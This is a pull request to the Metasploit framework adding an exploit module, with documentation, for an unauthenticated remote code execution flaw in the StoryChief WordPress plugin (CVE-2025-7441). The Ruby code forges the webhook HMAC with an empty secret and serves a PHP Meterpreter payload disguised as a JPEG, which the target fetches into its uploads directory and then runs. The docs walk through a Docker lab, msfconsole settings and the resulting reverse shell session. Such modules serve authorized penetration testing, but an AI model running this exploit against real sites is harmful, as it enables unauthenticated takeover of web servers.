### PR TITLE
Add StoryChief WordPress 1.0.42 unauthenticated RCE module (CVE-2025-7441)

### DIFF
--- a/documentation/modules/exploit/multi/http/wp_plugin_story_chef_file_upload.md
+++ b/documentation/modules/exploit/multi/http/wp_plugin_story_chef_file_upload.md
@@ -1,0 +1,310 @@
+## Vulnerable Application
+
+This module exploits an **unauthenticated Remote Code Execution (RCE)** vulnerability in the **StoryChief WordPress plugin <= 1.0.42**.
+
+The vulnerability exists due to improper validation of webhook HMAC signatures. The plugin accepts a forged signature when the shared secret is empty, allowing unauthenticated attackers to submit crafted webhook requests that cause the server to:
+
+1. Fetch attacker-controlled content
+2. Store it inside the WordPress uploads directory
+3. Execute arbitrary PHP code
+
+No authentication or user interaction is required.
+
+---
+
+
+## Container Architecture Overview
+
+The lab consists of two containers:
+
+| Service   | Image           | Purpose                |
+| --------- | --------------- | ---------------------- |
+| wordpress | wordpress:6.3.2 | Vulnerable application |
+| db        | mysql:5.7       | Backend database       |
+
+Both containers are attached to an isolated Docker bridge network automatically created by Docker Compose.
+
+```
+Attacker (Metasploit)
+        |
+        v
+  -------------------
+  | Docker Bridge   |
+  | 172.18.0.0/16   |
+  -------------------
+        |
+   --------------
+   | wordpress  |
+   | (Apache +  |
+   |  PHP)      |
+   --------------
+        |
+   --------------
+   |  mysql     |
+   --------------
+```
+
+The WordPress container communicates with MySQL internally using Docker DNS resolution (`db`).
+
+---
+
+# Docker Compose Configuration
+
+```yaml
+version: '3.8'
+
+services:
+  wordpress:
+    image: wordpress:6.3.2
+    container_name: wp_storychief
+    restart: always
+    ports:
+      - "8080:80"
+    environment:
+      WORDPRESS_DB_HOST: db
+      WORDPRESS_DB_USER: root
+      WORDPRESS_DB_PASSWORD: rootpass
+      WORDPRESS_DB_NAME: wordpress
+    volumes:
+      - wordpress_data:/var/www/html
+      - ./php.ini:/usr/local/etc/php/conf.d/custom.ini
+    depends_on:
+      - db
+      
+  db:
+    image: mysql:5.7
+    container_name: wp_db
+    restart: always
+    environment:
+      MYSQL_DATABASE: wordpress
+      MYSQL_ROOT_PASSWORD: rootpass
+    volumes:
+      - db_data:/var/lib/mysql
+
+volumes:
+  wordpress_data:
+  db_data:
+```
+
+---
+
+## Optional PHP Configuration
+
+Create `php.ini`:
+
+```ini
+upload_max_filesize = 64M
+post_max_size = 64M
+memory_limit = 256M
+```
+
+This ensures large payload uploads are not blocked by container PHP limits.
+
+---
+
+
+## Verification Steps
+
+
+## 1. Start the Lab
+
+```bash
+docker compose up -d
+docker ps
+```
+
+Ensure:
+
+* WordPress container is running
+* MySQL container is running
+* Port `8080` is bound successfully
+
+If port 8080 is already in use:
+
+```yaml
+ports:
+  - "8081:80"
+```
+
+Then update Metasploit:
+
+```
+set RPORT 8081
+```
+
+
+
+---
+
+## 2. Complete WordPress Installation
+
+Visit:
+
+```
+http://localhost:8080
+```
+
+Finish the WordPress setup wizard.
+
+After login, you **must configure permalinks properly** to avoid webhook routing issues.
+
+Go directly to:
+
+```
+http://localhost:8080/wp-admin/options-permalink.php
+```
+
+Change:
+
+* From: **Plain**
+* To: **Post name**
+
+Then click **Save Changes**.
+
+
+
+---
+
+## 3️. Install Vulnerable Plugin
+
+* Upload StoryChief version `1.0.42`
+* Activate plugin
+* Ensure webhook feature is enabled
+* Leave webhook secret empty (default vulnerable state)
+
+Confirm version inside container:
+
+```bash
+docker exec -it wp_storychief bash
+cd /var/www/html/wp-content/plugins
+grep Version story-chief/storychief.php
+```
+
+Expected:
+
+```
+Version: 1.0.42
+```
+
+---
+
+## 4️. Determine Correct LHOST (Important for WSL2)
+
+Inside your attacking environment:
+
+```bash
+ip a
+```
+
+Locate your interface IP (inet 172.x.x.x/20).
+
+
+
+---
+
+## 5️. Launch Metasploit
+
+```bash
+msfconsole
+use exploit/multi/http/wp_plugin_story_chef_file_upload
+```
+
+---
+
+## 6️. Configure Exploit Properly
+
+```
+set RHOSTS 127.0.0.1
+set RPORT 8080
+set TARGETURI /
+set LHOST <LHOST-ip>
+set SRVPORT 8000
+```
+
+Important:
+
+* `SRVPORT` must NOT equal `RPORT`
+* Default `SRVPORT 8080` conflicts with WordPress container
+
+---
+
+## 7️. Run Exploit
+
+```
+run
+```
+
+Expected output:
+
+```
+[*] Started reverse TCP handler on 172.21.176.212:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. StoryChief webhook endpoint reachable and likely vulnerable
+[*] Starting local HTTP server for payload hosting
+[*] Using URL: http://172.21.176.212:8000/LwYLvAyJV.php
+[*] Payload URL: http://172.21.176.212:8000/LwYLvAyJV.php/LwYLvAyJV.php
+[*] Sending malicious webhook request
+[+] Serving malicious payload to 172.21.176.1
+[+] Webhook accepted payload — attempting execution
+[*] Attempting to execute uploaded payload at /wp-content/uploads/2026/02/LwYLvAyJV.php
+[*] Sending stage (42137 bytes) to 172.21.176.1
+[+] Deleted LwYLvAyJV.php
+[*] Meterpreter session 1 opened (172.21.176.212:4444 -> 172.21.176.1:55688) at 2026-02-15 19:08:57 +0200
+```
+
+If you see:
+
+```
+Upload path did not return HTTP 200
+```
+
+but a session opens successfully — this is a harmless race condition and can be ignored.
+
+---
+
+## 8️. Confirm Code Execution
+
+Inside Meterpreter:
+
+```
+sysinfo
+getuid
+shell
+whoami
+pwd
+```
+
+Expected:
+
+```
+Computer        : 41dcc6d2d33a
+OS              : Linux 41dcc6d2d33a 6.6.87.2-microsoft-standard-WSL2 #1 SMP PREEMPT_DYNAMIC Thu Jun  5 18:30:46 UTC 2025 x86_64
+Architecture    : x64
+System Language : C
+Meterpreter     : php/linux
+Server username: www-data
+
+www-data
+/var/www/html/wp-content/uploads/2026/02
+```
+
+This confirms:
+
+* Payload written to uploads directory
+* Code executed as web server user
+* Execution occurred inside container namespace
+
+---
+
+## 9️. Validate Container Isolation (Optional)
+
+From Meterpreter shell:
+
+```
+cat /proc/1/cgroup
+```
+
+You should observe containerized environment behavior.
+
+This confirms exploitation is limited to container context.
+

--- a/documentation/modules/exploit/multi/http/wp_plugin_story_chef_file_upload.md
+++ b/documentation/modules/exploit/multi/http/wp_plugin_story_chef_file_upload.md
@@ -1,8 +1,12 @@
 ## Vulnerable Application
 
-This module exploits an **unauthenticated Remote Code Execution (RCE)** vulnerability in the **StoryChief WordPress plugin <= 1.0.42**.
+This module exploits an unauthenticated Remote Code Execution (RCE)
+vulnerability in the StoryChief WordPress plugin version 1.0.42 and below.
 
-The vulnerability exists due to improper validation of webhook HMAC signatures. The plugin accepts a forged signature when the shared secret is empty, allowing unauthenticated attackers to submit crafted webhook requests that cause the server to:
+The vulnerability exists due to improper validation of webhook HMAC
+signatures. The plugin accepts a forged signature when the shared
+secret is empty. This allows unauthenticated attackers to submit crafted
+webhook requests that cause the server to:
 
 1. Fetch attacker-controlled content
 2. Store it inside the WordPress uploads directory
@@ -10,45 +14,11 @@ The vulnerability exists due to improper validation of webhook HMAC signatures. 
 
 No authentication or user interaction is required.
 
----
+## Verification Steps
 
+### 1. Start the Lab
 
-## Container Architecture Overview
-
-The lab consists of two containers:
-
-| Service   | Image           | Purpose                |
-| --------- | --------------- | ---------------------- |
-| wordpress | wordpress:6.3.2 | Vulnerable application |
-| db        | mysql:5.7       | Backend database       |
-
-Both containers are attached to an isolated Docker bridge network automatically created by Docker Compose.
-
-```
-Attacker (Metasploit)
-        |
-        v
-  -------------------
-  | Docker Bridge   |
-  | 172.18.0.0/16   |
-  -------------------
-        |
-   --------------
-   | wordpress  |
-   | (Apache +  |
-   |  PHP)      |
-   --------------
-        |
-   --------------
-   |  mysql     |
-   --------------
-```
-
-The WordPress container communicates with MySQL internally using Docker DNS resolution (`db`).
-
----
-
-# Docker Compose Configuration
+Create the following `docker-compose.yml` file:
 
 ```yaml
 version: '3.8'
@@ -65,12 +35,9 @@ services:
       WORDPRESS_DB_USER: root
       WORDPRESS_DB_PASSWORD: rootpass
       WORDPRESS_DB_NAME: wordpress
-    volumes:
-      - wordpress_data:/var/www/html
-      - ./php.ini:/usr/local/etc/php/conf.d/custom.ini
     depends_on:
       - db
-      
+
   db:
     image: mysql:5.7
     container_name: wp_db
@@ -78,67 +45,33 @@ services:
     environment:
       MYSQL_DATABASE: wordpress
       MYSQL_ROOT_PASSWORD: rootpass
-    volumes:
-      - db_data:/var/lib/mysql
+````
 
-volumes:
-  wordpress_data:
-  db_data:
+Start the containers:
+
 ```
-
----
-
-## Optional PHP Configuration
-
-Create `php.ini`:
-
-```ini
-upload_max_filesize = 64M
-post_max_size = 64M
-memory_limit = 256M
-```
-
-This ensures large payload uploads are not blocked by container PHP limits.
-
----
-
-
-## Verification Steps
-
-
-## 1. Start the Lab
-
-```bash
 docker compose up -d
 docker ps
 ```
 
-Ensure:
+Ensure both containers are running and port 8080 is accessible.
 
-* WordPress container is running
-* MySQL container is running
-* Port `8080` is bound successfully
+If port 8080 is already in use, modify:
 
-If port 8080 is already in use:
-
-```yaml
+```
 ports:
   - "8081:80"
 ```
 
-Then update Metasploit:
+Then remember to update Metasploit:
 
 ```
 set RPORT 8081
 ```
 
+### 2. Complete WordPress Installation
 
-
----
-
-## 2. Complete WordPress Installation
-
-Visit:
+Navigate to:
 
 ```
 http://localhost:8080
@@ -146,97 +79,95 @@ http://localhost:8080
 
 Finish the WordPress setup wizard.
 
-After login, you **must configure permalinks properly** to avoid webhook routing issues.
-
-Go directly to:
+After logging in, configure permalinks:
 
 ```
 http://localhost:8080/wp-admin/options-permalink.php
 ```
 
-Change:
+Change from **Plain** to **Post name** and click **Save Changes**.
 
-* From: **Plain**
-* To: **Post name**
+### 3. Install Vulnerable Plugin
 
-Then click **Save Changes**.
+Upload StoryChief version 1.0.42 and activate it.
 
+Ensure the webhook feature is enabled and leave the webhook secret empty.
 
+Confirm plugin version inside the container:
 
----
-
-## 3️. Install Vulnerable Plugin
-
-* Upload StoryChief version `1.0.42`
-* Activate plugin
-* Ensure webhook feature is enabled
-* Leave webhook secret empty (default vulnerable state)
-
-Confirm version inside container:
-
-```bash
+```
 docker exec -it wp_storychief bash
 cd /var/www/html/wp-content/plugins
 grep Version story-chief/storychief.php
 ```
 
-Expected:
+Expected output:
 
 ```
 Version: 1.0.42
 ```
 
----
+### 4. Launch Metasploit
 
-## 4️. Determine Correct LHOST (Important for WSL2)
-
-Inside your attacking environment:
-
-```bash
-ip a
 ```
-
-Locate your interface IP (inet 172.x.x.x/20).
-
-
-
----
-
-## 5️. Launch Metasploit
-
-```bash
 msfconsole
 use exploit/multi/http/wp_plugin_story_chef_file_upload
 ```
 
----
-
-## 6️. Configure Exploit Properly
+### 5. Configure Module
 
 ```
 set RHOSTS 127.0.0.1
 set RPORT 8080
 set TARGETURI /
-set LHOST <LHOST-ip>
+set LHOST <attacker-ip>
 set SRVPORT 8000
 ```
 
-Important:
+Ensure SRVPORT does not conflict with the WordPress port.
 
-* `SRVPORT` must NOT equal `RPORT`
-* Default `SRVPORT 8080` conflicts with WordPress container
-
----
-
-## 7️. Run Exploit
+### 6. Run the Exploit
 
 ```
 run
 ```
 
-Expected output:
+If successful, a Meterpreter session should open.
+
+### 7. Confirm Code Execution
+
+Inside Meterpreter:
 
 ```
+sysinfo
+getuid
+```
+
+Successful exploitation confirms arbitrary PHP code execution
+within the WordPress container context.
+
+## 8. Validate Container Isolation (Optional)
+
+From Meterpreter shell:
+
+```
+cat /proc/1/cgroup
+```
+
+You should observe containerized environment behavior.
+
+This confirms exploitation is limited to container context.
+
+## Options
+
+
+
+## Scenarios
+
+```
+msf exploit(multi/http/wp_plugin_story_chef_file_upload) > run 
+
+
 [*] Started reverse TCP handler on 172.21.176.212:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. StoryChief webhook endpoint reachable and likely vulnerable
@@ -250,8 +181,23 @@ Expected output:
 [*] Sending stage (42137 bytes) to 172.21.176.1
 [+] Deleted LwYLvAyJV.php
 [*] Meterpreter session 1 opened (172.21.176.212:4444 -> 172.21.176.1:55688) at 2026-02-15 19:08:57 +0200
-```
 
+
+meterpreter > sysinfo 
+Computer        : 41dcc6d2d33a
+OS              : Linux 41dcc6d2d33a 6.6.87.2-microsoft-standard-WSL2 #1 SMP PREEMPT_DYNAMIC Thu Jun  5 18:30:46 UTC 2025 x86_64
+Architecture    : x64
+System Language : C
+Meterpreter     : php/linux 
+meterpreter > getuid
+Server username: www-data
+meterpreter > shell
+whoami
+www-data
+pwd
+/var/www/html/wp-content/uploads/2026/02
+
+```
 If you see:
 
 ```
@@ -259,52 +205,3 @@ Upload path did not return HTTP 200
 ```
 
 but a session opens successfully — this is a harmless race condition and can be ignored.
-
----
-
-## 8️. Confirm Code Execution
-
-Inside Meterpreter:
-
-```
-sysinfo
-getuid
-shell
-whoami
-pwd
-```
-
-Expected:
-
-```
-Computer        : 41dcc6d2d33a
-OS              : Linux 41dcc6d2d33a 6.6.87.2-microsoft-standard-WSL2 #1 SMP PREEMPT_DYNAMIC Thu Jun  5 18:30:46 UTC 2025 x86_64
-Architecture    : x64
-System Language : C
-Meterpreter     : php/linux
-Server username: www-data
-
-www-data
-/var/www/html/wp-content/uploads/2026/02
-```
-
-This confirms:
-
-* Payload written to uploads directory
-* Code executed as web server user
-* Execution occurred inside container namespace
-
----
-
-## 9️. Validate Container Isolation (Optional)
-
-From Meterpreter shell:
-
-```
-cat /proc/1/cgroup
-```
-
-You should observe containerized environment behavior.
-
-This confirms exploitation is limited to container context.
-

--- a/modules/exploits/multi/http/wp_plugin_story_chef_file_upload.rb
+++ b/modules/exploits/multi/http/wp_plugin_story_chef_file_upload.rb
@@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return CheckCode::Appears('StoryChief webhook endpoint reachable and likely vulnerable') if res.code != 404
 
-    CheckCode::Safe
+    CheckCode::Safe('Webhook endpoint returned 404. The plugin may not be installed, permalinks may not be configured, or the target is not vulnerable.')
   end
 
   #

--- a/modules/exploits/multi/http/wp_plugin_story_chef_file_upload.rb
+++ b/modules/exploits/multi/http/wp_plugin_story_chef_file_upload.rb
@@ -1,0 +1,208 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Remote::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress StoryChief Plugin Unauthenticated RCE',
+        'Description' => %q{
+          This module exploits an unauthenticated arbitrary file upload
+          vulnerability in the StoryChief WordPress plugin <= 1.0.42.
+
+          The plugin exposes a webhook endpoint at
+          /wp-json/storychief/webhook which accepts a forged HMAC.
+          Because the plugin uses an empty secret for HMAC validation,
+          attackers can compute a valid MAC and force WordPress to
+          download and store attacker-controlled PHP content inside
+          the uploads directory, resulting in remote code execution.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'xpl0dec', # Original PoC
+          'Nayera'   # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2025-7441'],
+          ['EDB', '52422'],
+          ['URL', 'https://github.com/Story-Chief/wordpress']
+        ],
+        'Platform' => ['php'],
+        'Arch' => ARCH_PHP,
+        'Targets' => [
+          ['Automatic Target', {}]
+        ],
+        'DisclosureDate' => '2025-08-04',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+          'WfsDelay' => 15
+        },
+        'Privileged' => false,
+        'Stance' => Msf::Exploit::Stance::Aggressive,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path to WordPress', '/'])
+    ])
+  end
+
+  #
+  # Check Method
+  #
+  def check
+    return CheckCode::Safe('WordPress not detected') unless wordpress_and_online?
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'wp-json', 'storychief')
+    )
+
+    unless res && res.code == 200
+      return CheckCode::Safe('StoryChief REST namespace not found')
+    end
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'wp-json', 'storychief', 'webhook'),
+      'ctype' => 'application/json',
+      'data' => '{"meta":{"mac":"","event":"publish"},"data":{}}'
+    )
+
+    return CheckCode::Unknown('No response from webhook endpoint') unless res
+
+    return CheckCode::Appears('StoryChief webhook endpoint reachable and likely vulnerable') if res.code != 404
+
+    CheckCode::Safe
+  end
+
+  #
+  # Serve malicious PHP payload
+  #
+  def on_request_uri(cli, _req)
+    print_good("Serving malicious payload to #{cli.peerhost}")
+
+    php_payload = payload.encoded
+
+    send_response(
+      cli,
+      php_payload,
+      'Content-Type' => 'image/jpeg'
+    )
+
+    close_client(cli)
+  end
+
+  #
+  # Generate JSON body + HMAC
+  #
+  def generate_signed_body(remote_url)
+    body_hash = {
+      'meta' => {
+        'event' => 'publish'
+      },
+      'data' => {
+        'featured_image' => {
+          'data' => {
+            'sizes' => {
+              'full' => remote_url
+            }
+          }
+        }
+      }
+    }
+
+    json_body = JSON.generate(body_hash).gsub('/', '\\/')
+    signature = OpenSSL::HMAC.hexdigest('sha256', '', json_body)
+
+    body_hash['meta']['mac'] = signature
+    JSON.generate(body_hash)
+  end
+
+  #
+  # Attempt to trigger uploaded shell
+  #
+  def trigger_shell(filename)
+    now = Time.now
+
+    upload_path = normalize_uri(
+      target_uri.path,
+      'wp-content',
+      'uploads',
+      now.year.to_s,
+      format('%02d', now.month),
+      filename
+    )
+
+    print_status("Attempting to execute uploaded payload at #{upload_path}")
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => upload_path
+    )
+
+    unless res && res.code == 200
+      print_warning('Upload path did not return HTTP 200 — upload may have failed')
+    end
+  end
+
+  #
+  # Main Exploit
+  #
+  def exploit
+    fail_with(Failure::BadConfig, 'SRVHOST must be set') if datastore['SRVHOST'].blank?
+
+    payload_name = "#{Rex::Text.rand_text_alphanumeric(8..12)}.php"
+    register_file_for_cleanup(payload_name)
+
+    print_status('Starting local HTTP server for payload hosting')
+
+    start_service(
+      'Uri' => {
+        'Path' => "/#{payload_name}",
+        'Proc' => proc { |cli, req| on_request_uri(cli, req) }
+      }
+    )
+
+    payload_url = "#{get_uri.chomp('/')}/#{payload_name}"
+    print_status("Payload URL: #{payload_url}")
+
+    request_body = generate_signed_body(payload_url)
+
+    print_status('Sending malicious webhook request')
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'wp-json', 'storychief', 'webhook'),
+      'ctype' => 'application/json',
+      'data' => request_body
+    )
+
+    fail_with(Failure::Unreachable, 'No response from target') unless res
+
+    unless res.code == 200 && res.body.include?('permalink')
+      fail_with(Failure::UnexpectedReply, "Unexpected response (#{res.code})")
+    end
+
+    print_good('Webhook accepted payload — attempting execution')
+
+    trigger_shell(payload_name)
+  end
+end

--- a/modules/exploits/multi/http/wp_plugin_story_chef_file_upload.rb
+++ b/modules/exploits/multi/http/wp_plugin_story_chef_file_upload.rb
@@ -159,7 +159,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     unless res && res.code == 200
-      print_warning('Upload path did not return HTTP 200 — upload may have failed')
+      fail_with(Failure::UnexpectedReply, 'Uploaded payload did not return HTTP 200, execution likely failed')
     end
   end
 
@@ -167,8 +167,6 @@ class MetasploitModule < Msf::Exploit::Remote
   # Main Exploit
   #
   def exploit
-    fail_with(Failure::BadConfig, 'SRVHOST must be set') if datastore['SRVHOST'].blank?
-
     payload_name = "#{Rex::Text.rand_text_alphanumeric(8..12)}.php"
     register_file_for_cleanup(payload_name)
 


### PR DESCRIPTION
This PR addresses issue [#20962](https://github.com/rapid7/metasploit-framework/issues/20962) by adding a new exploit module for [CVE-2025-7441](https://www.exploit-db.com/exploits/52422), targeting an **unauthenticated Remote Code Execution (RCE)** vulnerability in the **StoryChief WordPress plugin <= 1.0.42**.

The vulnerability is caused by improper validation of webhook HMAC signatures. When the webhook secret is empty (default configuration), the plugin accepts forged requests, allowing an unauthenticated attacker to upload arbitrary PHP files into the WordPress uploads directory and execute them. The module leverages this behavior to achieve remote code execution and establish a Meterpreter session.

---

## Module Details

**Module Path:**
`modules/exploits/multi/http/wp_plugin_story_chef_file_upload.rb`

**Platform:** PHP
**Targets:** Linux / PHP
**Vulnerability Type:** Unauthenticated Arbitrary File Upload → RCE

---

## Verification

- [ ] Start the vulnerable WordPress environment (Docker instructions provided in the documentation).
- [ ] Complete WordPress setup and set Permalinks to **Post name**.
- [ ] Install and activate StoryChief version 1.0.42.
- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/wp_plugin_story_chef_file_upload`
- [ ] `set RHOSTS <TARGET_IP>`
- [ ] `set RPORT 8080`
- [ ] `set TARGETURI /`
- [ ] `set LHOST <ATTACKER_IP>`
- [ ] `set SRVPORT 8000`
- [ ] `run`
- [ ] Verify that a Meterpreter session is successfully opened.
- [ ] Verify command execution (`whoami`, `pwd`, `sysinfo`).

### Full verification steps, lab setup, and exploitation scenario are documented in the corresponding module documentation.
